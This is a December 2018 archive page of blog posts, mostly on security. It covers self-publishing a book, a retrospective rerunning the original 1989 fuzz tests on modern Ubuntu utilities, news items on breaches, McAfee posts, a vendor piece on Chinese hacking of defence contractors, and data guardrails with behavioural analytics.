Monthly Archives: December 2018

Notes on Self-Publishing a Book

In this post I would like to share a few thoughts on self-publishing a book, in case anyone is considering that option.

As I mentioned in my post on burnout, one of my goals was to publish a book on a subject other than cyber security. A friend from my Krav Maga school, Anna Wonsley, learned that I had published several books, and asked if we might collaborate on a book about stretching. The timing was right, so I agreed.

I published my first book with Pearson and Addison-Wesley in 2004, and my last with No Starch in 2013. 14 years is an eternity in the publishing world, and even in the last 5 years the economics and structure of book publishing have changed quite a bit.

To better understand the changes, I had dinner with one of the finest technical authors around, Michael W. Lucas. We met prior to my interest in this book, because I had wondered about publishing books on my own. MWL started in traditional publishing like me, but has since become a full-time author and independent publisher. He explained the pros and cons of going it alone, which I carefully considered.

By the end of 2017, Anna and I were ready to begin work on the book. I believe our first "commits" occurred in December 2017.

For this stretching book project, I knew my strengths included organization, project management, writing to express another person's message, editing, and access to a skilled lead photographer. I learned that my co-author's strengths included subject matter expertise, a willingness to be photographed for the book's many pictures, and friends who would also be willing to be photographed.

None of us was very familiar with the process of transforming a raw manuscript and photos into a finished product. When I had published with Pearson and No Starch, they took care of that process, as well as copy-editing.

Beyond turning manuscript and photos into a book, I also had to identify a publication platform. Early on we decided to self-publish using one of the many newer companies offering that service. We wanted a company that could get our book into Amazon, and possibly physical book stores as well. We did not want to try working with a traditional publisher, as we felt that we could manage most aspects of the publishing process ourselves, and augment with specialized help where needed.

After a lot of research we chose Blurb. One of the most attractive aspects of Blurb was their expert ecosystem. We decided that we would hire one of these experts to handle the interior layout process. We contacted Jennifer Linney, who happened to be local and had experience publishing books to Amazon. We met in person, discussed the project, and agreed to move forward together.

I designed the structure of the book. As a former Air Force officer, I was comfortable with the "rule of threes," and brought some recent writing experience from my abandoned PhD thesis.

I designed the book to have an introduction, the main content, and a conclusion. Within the main content, the book featured an introduction and physical assessment, three main sections, and a conclusion. The three main sections consisted of a fundamental stretching routine, an advanced stretching routine, and a performance enhancement section -- something with Indian clubs, or kettle bells, or another supplement to stretching.

Anna designed all of the stretching routines and provided the vast majority of the content. She decided to focus on three physical problem areas -- tight hips, shoulders/back, and hamstrings. We encouraged the reader to "reach three goals" -- open your hips, expand your shoulders, and touch your toes. Anna designed exercises that worked in a progression through the body, incorporating her expertise as a certified trainer and professional martial arts instructor.

Initially we tried a process whereby she would write section drafts, and I would edit them, all using Google Docs. This did not work as well as we had hoped, and we spent a lot of time stalled in virtual collaboration.

By the spring of 2018 we decided to try meeting in person on a regular basis. Anna would explain her desired content for a section, and we would take draft photographs using iPhones to serve as placeholders and to test the feasibility of real content. We made a lot more progress using these methods, although we stalled again mid-year due to schedule conflicts.

By October our text was ready enough to try taking book-ready photographs. We bought photography lights from Amazon and used my renovated basement game room as a studio. We took pictures over three sessions, with Anna and her friend Josh as subjects. I spent several days editing the photos to prepare for publication, then handed the bundled manuscript and photographs to Jennifer for a light copy-edit and layout during November.

Our goal was to have the book published before the end of the year, and we met that goal. We decided to offer two versions. The first is a "collector's edition" featuring all color photographs, available exclusively via Blurb as Reach Your Goal: Collector's Edition. The second will be available at Amazon in January, and will feature black and white photographs.

While we were able to set the price of the book directly via Blurb, we could basically only suggest a price to Ingram and hence to Amazon. Ingram is the distributor that feeds Amazon and physical book stores. I am curious to see how the book will appear in those retail locations, and how much it will cost readers. We tried to price it competitively with older stretching books of similar size. (Ours is 176 pages with over 200 photographs.)

Without revealing too much of the economic structure, I can say that it's much cheaper to sell directly from Blurb. Their cost structure allows us to price the full color edition competitively. However, one of our goals was to provide our book through Amazon, and to keep the price reasonable we had to sell the black and white edition outside of Blurb.

Overall I am very pleased with the writing process, and exceptionally happy with the book itself. The color edition is gorgeous and the black and white version is awesome too.

The only change I would have made to the writing process would have been to start the in-person collaboration from the beginning. Working together in person accelerated the transfer of ideas to paper and played to our individual strengths of Anna as subject matter expert and me as a writer.

In general, I would not recommend self-publishing if you are not a strong writer. If writing is not your forte, then I highly suggest you work with a traditional publisher, or contract with an editor. I have seen too many self-published books that read terribly. This usually happens when the author is a subject matter expert, but has trouble expressing ideas in written form.

The bottom line is that it's never been easier to make your dream of writing a book come true. There are options for everyone, and you can leverage them to create wonderful products that scale with demand and can really help your audience reach their goals!

If you want to start the new year with better flexibility and fitness, consider taking a look at our book on Blurb! When the Amazon edition is available I will update this post with a link.

Update: Here is the Amazon listing.

Cross-posted from Rejoining the Tao Blog.

Fuzzing Like It’s 1989

With 2019 a day away, let’s reflect on the past to see how we can improve. Yes, let’s take a long look back 30 years and reflect on the original fuzzing paper, An Empirical Study of the Reliability of UNIX Utilities, and its 1995 follow-up, Fuzz Revisited, by Barton P. Miller.

In this blog post, we are going to find bugs in modern versions of Ubuntu Linux using the exact same tools as described in the original fuzzing papers. You should read the original papers not only for context, but for their insight. They proved to be very prescient about the vulnerabilities and exploits that would plague code over the decade following their publication. Astute readers may notice the publication date for the original paper is 1990. Even more perceptive readers will observe the copyright date of the source code comments: 1989.

A Quick Review

For those of you who didn’t read the papers (you really should), this section provides a quick summary and some choice quotes.

The fuzz program works by generating random character streams, with the option to generate only printable, control, or non-printable characters. The program uses a seed to generate reproducible results, which is a useful feature modern fuzzers often lack. A set of scripts execute target programs and check for core dumps. Program hangs are detected manually. Adapters provide random input to interactive programs (1990 paper), network services (1995 paper), and graphical X programs (1995 paper).

The 1990 paper tests four different processor architectures (i386, CVAX, Sparc, 68020) and five operating systems (4.3BSD, SunOS, AIX, Xenix, Dynix). The 1995 paper has similar platform diversity. In the first paper, 25-33% of utilities fail, depending on the platform. In the 1995 follow-on, the numbers range from 9%-33%, with GNU (on SunOS) and Linux being by far the least likely to crash.

The 1990 paper concludes that (1) programmers do not check array bounds or error codes, (2) macros make code hard to read and debug, and (3) C is very unsafe. The extremely unsafe gets function and C’s type system receive special mention. During testing, the authors discover format string vulnerabilities years before their widespread exploitation (see page 15). The paper concludes with a user survey asking about how often users fix or report bugs. Turns out reporting bugs was hard and there was little interest in fixing them.

The 1995 paper mentions open source software and includes a discussion of why it may have fewer bugs. It also contains this choice quote:

When we examined the bugs that caused the failures, a distressing phenomenon emerged: many of the bugs discovered (approximately 40%) and reported in 1990 are still present in their exact form in 1995. …

The techniques used in this study are simple and mostly automatic. It is difficult to understand why a vendor would not partake of a free and easy source of reliability improvements.

It would take another 15-20 years for fuzz testing to become standard practice at large software development shops.

I also found this statement, written in 1990 to be prescient of things to come:

Often the terseness of the C programming style is carried to extremes; form is emphasized over correct function. The ability to overflow an input buffer is also a potential security hole, as shown by the recent Internet worm.

Testing Methodology

Thankfully, after 30 years, Dr. Barton still provides full source code, scripts, and data to reproduce his results, which is a commendable goal that more researchers should emulate. The scripts and fuzzing code have aged surprisingly well. The scripts work as is, and the fuzz tool required only minor changes to compile and run.

For these tests, we used the scripts and data found in the fuzz-1995-basic repository, because it includes the most modern list of applications to test. As per the top-level README, these are the same random inputs used for the original fuzzing tests. The results presented below for modern Linux used the exact same code and data as the original papers. The only thing changed is the master command list to reflect modern Linux utilities.

Updates for 30 Years of New Software

Obviously there have been some changes in Linux software packages in the past 30 years, although quite a few tested utilities still trace their lineage back several decades. Modern versions of the same software audited in the 1995 paper were tested, where possible. Some software was no longer available and had to be replaced. The justification for each replacement is as follows:

  • cfecc1: This is a C preprocessor and equivalent to the one used in the 1995 paper.
  • dbxgdb: This is a debugger, an equivalence to that used in the 1995 paper.
  • ditroffgroff: ditroff is no longer available.
  • dtblgtbl: A GNU Troff equivalent of the old dtbl utility.
  • lispclisp: A common lisp implementation.
  • moreless: Less is more!
  • prologswipl: There were two choices for prolog: SWI Prolog and GNU Prolog. SWI Prolog won out because it is an older and a more comprehensive implementation.
  • awkgawk: The GNU version of awk.
  • ccgcc: The default C compiler.
  • compressgzip: GZip is the spiritual successor of old Unix compress.
  • lintsplint: A GPL-licensed rewrite of lint.
  • /bin/mail/usr/bin/mail: This should be an equivalent utility at a different path.
  • f77fort77: There were two possible choices for a Fortan77 compiler: GNU Fortran and Fort77. GNU Fortran is recommended for Fortran 90, while Fort77 is recommended for Fortran77 support. The f2c program is actively maintained and the changelog records entries date back to 1989.


The fuzzing methods of 1989 still find bugs in 2018. There has, however, been progress.

Measuring progress requires a baseline, and fortunately, there is a baseline for Linux utilities. While the original fuzzing paper from 1990 predates Linux, the 1995 re-test uses the same code to fuzz Linux utilities on the 1995 Slackware 2.1.0 distribution. The relevant results appear on Table 3 of the 1995 paper (pages 7-9). GNU/Linux held up very well against commercial competitors:

The failure rate of the utilities on the freely-distributed Linux version of UNIX was second-lowest at 9%.

Let’s examine how the Linux utilities of 2018 compare to the Linux utilities of 1995 using the fuzzing tools of 1989:

Ubuntu 18.10 (2018) Ubuntu 18.04 (2018) Ubuntu 16.04 (2016) Ubuntu 14.04 (2014) Slackware 2.1.0 (1995)
Crashes 1 (f77) 1 (f77) 2 (f77, ul) 2 (swipl, f77) 4 (ul, flex, indent, gdb)
Hangs 1 (spell) 1 (spell) 1 (spell) 2 (spell, units) 1 (ctags)
Total Tested 81 81 81 81 55
Crash/Hang % 2% 2% 4% 5% 9%

Amazingly, the Linux crash and hang count is still not zero, even for the latest Ubuntu release. The f2c program called by f77 triggers a segmentation fault, and the spell program hangs on two of the test inputs.

What Are The Bugs?

There are few enough bugs that I could manually investigate the root cause of some issues. Some results, like a bug in glibc, were surprising while others, like an sprintf into a fixed-sized buffer, were predictable.

The ul crash

The bug in ul is actually a bug in glibc. Specifically, it is an issue reported here and here (another person triggered it in ul) in 2016. According to the bug tracker it is still unfixed. Since the issue cannot be triggered on Ubuntu 18.04 and newer, the bug has been fixed at the distribution level. From the bug tracker comments, the core issue could be very serious.

f77 crash

The f77 program is provided by the fort77 package, which itself is a wrapper script around f2c, a Fortran77-to-C source translator. Debugging f2c reveals the crash is in the errstr function when printing an overly long error message. The f2c source reveals that it uses sprintf to write a variable length string into a fixed sized buffer:

errstr(const char *s, const char *t)
  char buff[100];
  sprintf(buff, s, t);

This issue looks like it’s been a part of f2c since inception. The f2c program has existed since at least 1989, per the changelog. A Fortran77 compiler was not tested on Linux in the 1995 fuzzing re-test, but had it been, this issue would have been found earlier.

The spell Hang

This is a great example of a classical deadlock. The spell program delegates spell checking to the ispell program via a pipe. The spell program reads text line by line and issues a blocking write of line size to ispell. The ispell program, however, will read at most BUFSIZ/2 bytes at a time (4096 bytes on my system) and issue a blocking write to ensure the client received spelling data processed thus far. Two different test inputs cause spell to write a line of more than 4096 characters to ispell, causing a deadlock: spell waits for ispell to read the whole line, while ispell waits for spell to acknowledge that it read the initial corrections.

The units Hang

Upon initial examination this appears to be an infinite loop condition. The hang looks to be in libreadline and not units, although newer versions of units do not suffer from the bug. The changelog indicates some input filtering was added, which may have inadvertently fixed this issue. While a thorough investigation of the cause and correction was out of scope for this blog post, there may still be a way to supply hanging input to libreadline.

The swipl Crash

For completeness I wanted to include the swipl crash. However, I did not investigate it thoroughly, as the crash has been long-fixed and looks fairly benign. The crash is actually an assertion (i.e. a thing that should never occur has happened) triggered during character conversion:

[Thread 1] pl-fli.c:2495: codeToAtom: Assertion failed: chrcode >= 0
C-stack trace labeled "crash":
  [0] __assert_fail+0x41
  [1] PL_put_term+0x18e
  [2] PL_unify_text+0x1c4

It is never good when an application crashes, but at least in this case the program can tell something is amiss, and it fails early and loudly.


Fuzzing has been a simple and reliable way to find bugs in programs for the last 30 years. While fuzzing research is advancing rapidly, even the simplest attempts that reuse 30-year-old code are successful at identifying bugs in modern Linux utilities.

The original fuzzing papers do a great job at foretelling the dangers of C and the security issues it would cause for decades. They argue convincingly that C makes it too easy to write unsafe code and should be avoided if possible. More directly, the papers show that even naive fuzz testing still exposes bugs, and such testing should be incorporated as a standard software development practice. Sadly, this advice was not followed for decades.

I hope you have enjoyed this 30-year retrospective. Be on the lookout for the next installment of this series: Fuzzing In The Year 2000, which will investigate how Windows 10 applications compare against their Windows NT/2000 equivalents when faced with a Windows message fuzzer. I think that you can already guess the answer.

Evaluating Advanced Persistent Threats Mitigation Effects:A Review

Advanced Persistent Threat (APT) is a targeted attack method used by a sophisticated, determined and skilled adversary to maintain undetected access over an extended period for exfiltration of valuable data. APT poses high threat levels to organizations especially government organizations. 60% of the problem is the inability to detect penetration using traditional mitigation methods. Numerous researches indicate that vulnerabilities exists in most organizations and when exploited will have major fininacial implications and also affect the organization’s reputation. Traditional methods for mitigating threats against security breaches have proved ineffective. This project aims at evaluating the utilization and effectiveness of Advanced Persistent Threats Mitigation techniques using existing literature and thereby providing a synopsis on APT. A method-based approach is adopted, reviewing the researches and a comparative analysis of the methods used in the mitigation of APT. The study compares 25 researches, which proposed methods in mitigating the threat, were filtered separating mitigation methods from review articles, identifying the threats etc. from a wide range of research reports between 2011 and 2017. These 25 researches were analysed to show the effectiveness of 12 mitigation methods utilized by the researchers. In mitigating APT multiple methods are employed by 72% of the researchers. The major methods used in mitigating APT are Traffic/data analysis (30%), Pattern recognition (21%) and anomaly Detection (16%). These three methods work inline with providing effective internal audit, risk management and cooperate governance as highlighted in COBIT5 an IT management and governance framework by ISACA.

Hackers steal personal data from 997 North Korean defectors

Hackers just caused grief for North Korean defectors. South Korea's Unification Ministry has revealed that attackers stole the personal data of 997 defectors, including their names and addresses. The breach came after a staff member at the Hana Foundation, which helps settle northerners, unwittingly opened email with malware. The defectors' data is normally supposed to be isolated from the internet and encrypted, but the unnamed staffer didn't follow those rules, officials said.

Source: Wall Street Journal

Mind-Bending Tech: What Parents Need to Know About Virtual & Augmented Reality 

Virtual and Augmented reality technology is changing the way we see the world.

You’ve probably heard the buzz around Virtual Reality (VR) and Augmented Reality (AR) and your child may have even put VR gear on this year’s wish list. But what’s the buzz all about and what exactly do parents need to know about these mind-bending technologies?

VR and AR technology sound a bit sci-fi and intimidating, right? They can be until you begin to understand the amazing ways these technologies are being applied to entertainment as well as other areas like education and healthcare. But, like any new technology, where there’s incredible opportunity there are also safety issues parents don’t want to ignore.

According to a report from Common Sense Media, 60 percent of parents are worried about VR’s health effects on children, while others say the technology will have significant educational benefits.

Virtual Reality

Adults and kids alike are using VR technology — headsets, software, and games — to experience the thrill of being in an immersive environment.

The Pokemon Go app uses AR technology to overlay characters on an existing environment.

According to Consumer Technology Association’s (CTA) 20th Annual Consumer Technology Ownership and Market Potential Study, there are now 7 million VR headsets in U.S. households, which equates to about six percent of homes. CTA estimates that 3.9 million VR/AR headsets shipped in 2017 and 4.9 million headsets will ship in 2018.

With VR technology, a user wears a VR Head Mounted Display (HMD) headset and interacts with 3D computer-generated environments on either a PC or smart phone that allows them to feel — or experience the illusion — that he or she is actually in that place. The VR headset has eye displays (OLED) for each eye that show an environment at different angles to give the perception of depth. VR environments are diverse. One might include going inside the human body to learn about the digestive system, another environment might be a battlefield, while another might be a serene ocean view. The list of games, apps, experiences, and movies goes on and on.

Augmented Reality

AR differs from VR in that it overlays digital information onto physical surroundings and does not require a headset. AR is transparent and allows you to see and interact with your environment. It adds digital images and data to enhance views of the real world. AR is used in apps like Pokémon Go and GPS and walking apps that allow you to see your environment in real time. Not as immersive as VR, AR can still enrich a physical reality and is finding its way into a number of industries. VR and AR technologies are used in education for e learning and in the military for combat, medic, and flight simulation training. The list of AR applications continues to grow.

To support these growing technologies, there are thousands of games, videos, live music and events available. Museums and arcades exist and theme parks are adapting thrill rides to meet the demand for VR experiences. Increasingly retailers are hopping on board to use VR to engage customers, which will be a hot topic at the upcoming 2019 Consumer Electronics Show (CES) in Las Vegas.

Still, there are questions from parents such as what effect will these immersive technologies have on children’s brains and if VR environments blur the line between reality and fantasy enough to change a child’s behavior. The answer: At this point, not a lot is known about VR’s affect on children but medical opinions are emerging warning of potential health impacts. So, calling a family huddle on the topic is a good idea you have these technologies in your home or plan to in the near future.

VR/AR talking points for families

Apply safety features. VR apps and games include safety features such as restricted chat and privacy settings that allow users to filter out crude language and report abusive behavior. While some VR environments have moderators in place, some do not. This is also a great time to discuss password safety and privacy with your kids.

The best way to understand VR? Jump in the fun alongside your kids.

Age ratings and reviews. Some VR apps or games contain violence so pay attention to age restrictions. Also, be sure to read the reviews of the game to determine the safety, quality, and value of the VR/AR content.

Inappropriate content. While fun, harmless games and apps exist, so too does sexual content that kids can and do seek out. Be aware of how your child is using his or her VR headset and what content they are engaged with. Always monitor your child’s tech choices.

Isolation. A big concern with VR’s immersive structure is that players can and do become isolated in a VR world and, like with any fun technology, casual can turn addictive. Time limits on VR games and monitoring are recommended.

Physical safety/health. Because games are immersive, VR players can fall or hurt themselves or others while playing. To be safe, sit down while playing, don’t play in a crowded space, and remove pets from the playing area.

In addition to physical safety, doctors have expressed VR-related health concerns. Some warn about brain and eye development in kids related to VR technology. Because of the brain-eye connection of VR, players are warned about dizziness, nausea, and anxiety related to prolonged play in a VR environment.

Doctors recommend adult supervision at all times and keeping VR sessions short to give the eyes, brain, and emotions a rest. The younger the child, the shorter the exposure should be.

Be a good VR citizen. Being a good digital citizen extends to the VR world. When playing multi-player VR games, be respectful, kind, and remember there are real hearts behind those avatars. Also, be mindful of the image your own avatar is communicating. Be aware of bullies and bullying behavior in a virtual world where the lines between reality and fantasy can get blurred.

Get in the game. If you allow your kids to play VR games, get immersed in the game with them. Understand the environments, the community, the feeling of the game, and the safety risks first hand. A good rule: If you don’t want your child to experience something in the real world — violence, cursing, fear, anxiety — don’t let them experience it in a virtual world.

To get an insider’s view of what a VR environment is like and to learn more about potential security risks, check out McAfee’s podcast Hackable?, episode #18, Virtually Vulnerable.

The post Mind-Bending Tech: What Parents Need to Know About Virtual & Augmented Reality  appeared first on McAfee Blogs.

Hackers defeat vein authentication by making a fake hand

Biometric security has moved beyond just fingerprints and face recognition to vein-based authentication. Unfortunately, hackers have already figured out a way to crack that, too. According to Motherboard, security researchers at the Chaos Communication Congress hacking conference in Leipzig, Germany showed a model wax hand that they used to defeat a vein authentication system using a wax model hand.

Source: Motherboard

McAfee 2018: Year in Review

2018 was an eventful year for all of us at McAfee. It was full of discovery, innovation, and progress—and we’re thrilled to have seen it all come to fruition. Before we look ahead to what’s in the pipeline for 2019, let’s take a look back at all the progress we’ve made this year and see how McAfee events, discoveries, and product announcements have affected, educated, and assisted users and enterprises everywhere.

MPOWERing Security Professionals Around the World

Every year, security experts gather at MPOWER Cybersecurity Summit to strategize, network, and learn about innovative ways to ward off advanced cyberattacks. This year was no different, as innovation was everywhere at MPOWER Americas, APAC, Japan, and EMEA. At the Americas event, we hosted Partner Summit, where head of channel sales and operations for the Americas, Ken McCray, discussed the program, products, and corporate strategy. Partners had the opportunity to dig deeper into this information through several Q&A sessions throughout the day. MPOWER Americas also featured groundbreaking announcements, including McAfee CEO Chris Young’s announcement of the latest additions to the MVISION product family: MVISION® Endpoint Detection and Response (MVISION EDR) and MVISION® Cloud.

ATR Analysis

This year was a prolific one, especially for our Advanced Threat Research team, which unveiled discovery after discovery about the threat landscape, from ‘Operation Oceansalt’ delivering five distinct waves of attacks on victims, to Triton malware spearheading the latest attacks on industrial systems, to GandCrab ransomware evolving rapidly, to the Cortana vulnerability. These discoveries not only taught us about cybercriminal techniques and intentions, but they also helped us prepare ourselves for potential threats in 2019.

Progress via Products

2018 wouldn’t be complete without a plethora of product updates and announcements, all designed to help organizations secure crucial data. This year, we were proud to announce McAfee MVISION®, a collection of products designed to support native security controls and third-party technologies.

McAfee MVISION® Endpoint orchestrates the native security controls in Windows 10 with targeted advanced threat defenses in a unified management workflow to visualize and investigate threats, understand compliance, and pivot to action. McAfee MVISION®  Mobile protects against threats on Android and iOS devices. McAfee MVISION® ePO, a SaaS service, is designed to eliminate complexity by elevating management above the specific threat defense technologies with simple, intuitive workflows for security threat and compliance control across devices.

Beyond that, many McAfee products were updated to help security teams everywhere adapt to the ever-evolving threat landscape, and some even took home awards for their excellence.

All in all, 2018 was a great year. But, as always with cybersecurity, there’s still work to do, and we’re excited to work together to create a secure 2019 for everyone.

To learn more about McAfee, be sure to follow us at @McAfee and @McAfee_Business.

The post McAfee 2018: Year in Review appeared first on McAfee Blogs.

Chinese Hackers Pose a Serious Threat to Military Contractors

Chinese hackers have successfully breached contractors for the U.S. Navy, according to WSJ report.

The years-long Marriott Starwood database breach was almost certainly the work of nation-state hackers sponsored by China, likely as part of a larger campaign by Chinese hackers to breach health insurers and government security clearance files, The New York Times reports. Why would foreign spies be so interested in the contents of a hotel’s guest database? Turns out “Marriott is the top hotel provider for American government and military personnel.” The Starwood database contained a treasure trove of highly detailed information about these personnel’s movements around the world.

Chinese hackers didn’t stop there. According to a report published in the Wall Street Journal last week, nation-state hackers sponsored by China have successfully breached numerous third-party contractors working for the U.S. Navy on multiple occasions over the past 18 months. The data stolen included highly classified information about advanced military technology currently under development, including “secret plans to build a supersonic anti-ship missile planned for use by American submarines.” The WSJ noted that hackers specifically targeted third-party federal contractors because many are small firms that lack the financial resources to invest in robust cyber security defenses.

In testimony before a Senate Judiciary Committee hearing, FBI counterintelligence division head E.W. “Bill” Priestap Wednesday called cyberespionage on the part of Chinese hackers the “most severe” threat to American security, citing the country’s “relentless theft of U.S. assets” in an effort to “supplant [the United States] as the world’s superpower.”

Inconsistent security practices leave U.S. Ballistic Missile Defense System vulnerable to cyber attacks

While the Navy has been hit particularly hard, the entire U.S. government, including all branches of the military, are under constant threats of cyber attack from Chinese hackers and other nation-state actors – and they’re ill-prepared to fend off these attacks. Around the same time the Marriott Starwood breach was disclosed, the Defense Department Office of Inspector General (OIG) released an audit report citing inconsistent security practices at DoD facilities, including facilities managed by third-party contractors, that store technical information on the nation’s ballistic missile defense system (BMDS). The report described failures to enact basic security measures, such as:

  • Requiring the use of multifactor authentication to access BMDS technical information
  • Identifying and mitigating known network vulnerabilities
  • Locking server racks
  • Protecting and monitoring classified data stored on removable media
  • Encrypting BMDS technical information transmission
  • Implementing intrusion detection capabilities on classified networks
  • Requiring written justification to obtain and elevate system access for users
  • Consistently implementing physical security controls to limit unauthorized access to facilities that manage BMDS technical information

Cyber security problems abound among DoD and other federal contractors

The OIG report comes on the heels of another the office issued earlier this year, citing security problems specifically at contractor-run military facilities. The WSJ report on Chinese hackers implied that inadequate security is the norm, not the exception, at federal contractors and subcontractors, citing an intelligence official who described military subcontractors as “lagging behind in cybersecurity and frequently [suffering] breaches” that impact not just the military branch they work for, but also other branches.

In theory, military contractors shouldn’t be having these problems. Most federal contractors must comply with the strict security controls outlined in NIST 800-171, and DoD contractors must comply with DFARS 800-171. DoD contractors were required to, at minimum, have a “system security plan” in place by December 31, 2017. However, many small and mid-sized organizations missed the December 31 deadline, often because they felt they did not have the resources to comply. However, continued non-compliance puts these vendors’ contracts at risk of cancellation, as well as national security at risk from Chinese hackers and other cyber criminals.

It’s not too late to begin compliance efforts. If your agency starts working towards compliance now, you can demonstrate that you have a plan to comply and are making progress with it to your prime contractor, subcontractor, or DoD contracting officer.

Affordable DFARS 800-171 compliance services are available for small and mid-sized federal contractors

Continuum GRC’s IT Audit Machine (ITAM) greatly simplifies the compliance process and significantly cuts the time and costs involved, putting NIST 800-171 and DFARS 800-171 compliance within reach of small and mid-sized organizations. Additionally, Continuum GRC has partnered with Gallagher Affinity to offer small and mid-sized federal contractors affordable packages that combine cyber and data breach insurance coverage with NIST 800-171 and DFARS 800-171 compliance services.

The cyber security experts at Continuum GRC have deep knowledge of the cyber security field, are continually monitoring the latest information security threats, and are committed to protecting your organization from security breaches. Continuum GRC offers full-service and in-house risk assessment and risk management subscriptions, and we help companies all around the world sustain proactive cyber security programs.

Continuum GRC is proactive cyber security®. Call 1-888-896-6207 to discuss your organization’s cyber security needs and find out how we can help your organization protect its systems and ensure compliance.

The post Chinese Hackers Pose a Serious Threat to Military Contractors appeared first on .

Quick Wins with Data Guardrails and Behavioral Analytics

Posted under: Research and Analysis

This is the third (and final) post in our series on Protecting What Matters: Introducing Data Guardrails and Behavioral Analytics. Our first post, Introducing Data Guardrails and Behavioral Analytics: Understand the Mission we introduced the concepts and outlined the major categories of insider risk. In the second post we delved into and defined the terms. And as we wrap up the series, we’ll bring it together via a scenario showing how these concepts would work in practice

As we wrap up the Data Guardrails and Behavioral Analytics series, let’s go through a quick scenario to provide a perspective on how these concepts apply to a simplistic example. Our example company is a small pharmaceutical company. As with all pharma companies, much of their value lies in intellectual property, which makes that the most significant target for attackers. Thanks to fast growth and a highly competitive market, the business isn’t waiting for perfect infrastructure and controls before launching products and doing partnerships. Being a new company without legacy infrastructure (or mindset), a majority of the infrastructure has been built in the cloud and they take a cloud-first approach.

In fact, the CEO has been recognized for their innovative use of cloud-based analytics to accelerate the process of identifying new drugs. As excited as the CEO is about these new computing models, the board is very concerned about both external attacks and insider threats as their proprietary data resides in dozens of service providers. So, the security team feels pressure to do something to address the issue.

The CISO is very experienced, but is still coming to grips with the changes in mindset, controls and operational motions inherent to a cloud-first approach. Defaulting to the standard data security playbook represents the path of least resistance, but she’s savvy enough to know that would create significant gaps in both visibility and control of the company’s critical intellectual property. The approach of using Data Guardrails and Data Behavioral Analytics presents an opportunity to both define a hard set of policies for data usage and protection, as well as watch for anomalous behaviors potentially indicating malicious intent. So let’s see how she would lead her organization thru a process to define Data Guardrails and Behavioral Analytics.

Finding the Data

As we mentioned in the previous post, what’s unique about data guardrails and behavioral analytics is combining content knowledge (classification) with context and usage. Thus, the first steps we’ll take is classifying the sensitive data within the enterprise.

This involves undertaking an internal discovery of data resources. The technology to do this is mature and well understood, although they need to ensure discovery extends to cloud-based resources. Additionally, they need to talk to the senior leaders of the business to make sure they understand how business strategy impacts application architecture and therefore the location of sensitive data.

Internal private research data and clinical trials make up most of the company’s intellectual property. This data can be both structured and unstructured, complicating the discovery process. This is somewhat eased as the organization has embraced cloud storage to centralize the unstructured data and embrace SaaS wherever possible for front office functions. A lot of the emerging analytics use cases continue to provide a challenge to protect, given the relatively immature operational processes in their cloud environments.

As with everything else security, visibility comes before control, and this discovery and classification process needs to be the first thing done to get the data security process moving. To be clear, having a lot of the data in a cloud service addressable via an API doesn’t help keep the classification data current. This remains one of the bigger challenges to data security, and as such requires specific activities (and the associated resources allocated) to keep the classification up to date as the process rolls into production.

Defining Data Guardrails

As we’ve mentioned previously, guardrails are rule sets that keep users within the lines of authorized activity. Thus, the CISO starts by defining the authorized actions and then enforcing those policies where the data resides. For simplicity’s sake, we’ll break the guardrails into three main categories:

  • Access: These guardrails have to do with enforcing access to the data. For instance, files relating to recruiting participants in a clinical trial need to be heavily restricted to the group tasked with recruitment. If someone were to open up access to a broader group, or perhaps tag the folder as public, the guardrail would remove that access and restrict it to the proper group.
  • Action: She will also want to define guardrails on who can do what with the data. It’s important to prevent someone from deleting data or copying it out of the analytics application, thus these guardrails ensure the integrity of the data by preventing misuse, whether intentional/malicious or accidental.
  • Operational: The final category of guardrails controls the operational integrity and resilience of the data. Enterprising data scientists can load up new analytics environments quickly and easily, but may not take the necessary precautions to ensure data back up or required logging/monitoring happens. Guardrails to implement automatic back-ups and monitoring can be set up as part of every new analytics environment.

The key in designing guardrails is to think of them as enablers, not blockers. The effectiveness of exception handling typically is the difference between a success and failure in implementing guardrails. To illuminate this, let’s consider a joint venture the organization has with a smaller biotech company. A guardrail exists to restrict access to the data related to this product to a group of 10 internal researchers. Yet clearly researchers from the joint venture partner need access as well, so you’ll need to expand the access rules of the guardrail. But you also may want to enforce multi-factor authentication on those external users or possibly implement a location guardrail to restrict external access to only IP addresses within the partner’s network.

As you can see, you have a lot of granularity in how you deploy the guardrails. But stay focused on getting quick wins up front, so don’t try to boil the ocean and implement every conceivable guardrail on Day 1. Focus on the most sensitive data and establish and refine the exception handling process. Then systematically add more guardrails as the process matures and you learn what has the most impact on reducing attack surface.

Refining Data Behavioral Analytics

Once the guardrails are in place, you have a low bar of data security implemented. You can be confident scads of data won’t be extracted and copied, or unauthorized groups won’t access data they shouldn’t. By establishing authorized activities, and stopping things that aren’t specifically authorized, a large part of the attack surface is eliminated.

That being said, authorized users can create a lot of damage either maliciously or accidentally. Behavioral analytics steps in where guardrails end by reducing the risks of negative activities that fall outside of the pre-defined rules. Thus, we want to pair data guardrails with an analysis of data usage to identify patterns of typical use and then look for non-normal data usage and behavior. This requires telemetry, analysis and tuning. Let’s use unstructured data as the means to describe the approach.

Getting back to our pharma example, the cloud storage provider tracks who does what to every bit of data in their environment. This telemetry becomes the basis of their Data Behavioral Analytics program. In order to accurately train the analytics model, they need data on not just known-good activity, but also activity that they know violates the policies. Keep in mind the importance of data quality, as opposed to mere data quantity. When building your own program make sure to gather data on user context and entitlements, so you can track how the data has been used, when and by which user populations.

Of course, you could just look for anomalous patterns on all of the telemetry, but that can create a lot of noise. So we recommend you start by identifying a type of behavior you want to detect. For instance, mass exfiltration of clinical trial data. So you’d identify which specific files/folders have that data, and look at the different patterns of activity. A quick analysis shows that a group of researchers in Asia have been accessing those folders, but at non-working hours in their local geography. That raises an alarm and causes you to investigate. It turns out that one of the researchers collaborates with another team in Europe, and thus has been working non-standard hours, resulting in the anomalous data access. In this case it’s legitimate, but this approach both alerts you to potential misuse, and also sends the message that the security team looks for this kind of activity as a bit of a deterrent.

If you use an off the shelf product much of this may be defined for you as starting points. Clusters of user activity based on groups, social graphs, hours and locations, and similar pattern feeds tend to be useful in a wide range of behavioral analytics use cases. You will likely still want to tune these over time to more refined use cases that reflect your own organization’s needs and patterns.

As with any analytical technique, there will be tuning required over time as things change in your environment that necessarily impact the accuracy and relevance of the analytics. So we’ll reiterate again the importance of sufficiently staffing your program to manage the alerts and ensure the thresholds walk that fine line between signal and noise.

Between the data guardrails to handle known risks and enforce authorized use policies and the data behavioral analytics to detect situations you couldn’t have predicted or malicious activity, leveraging these new approaches brings data security into the modern age.

As always, we’ll be factoring in comments and feedback on the blog series, so if you see something you don’t like or don’t agree with, let us know. We’ll be refining the content and packaging it up into a white paper, which will appear in the research library within a couple of weeks.

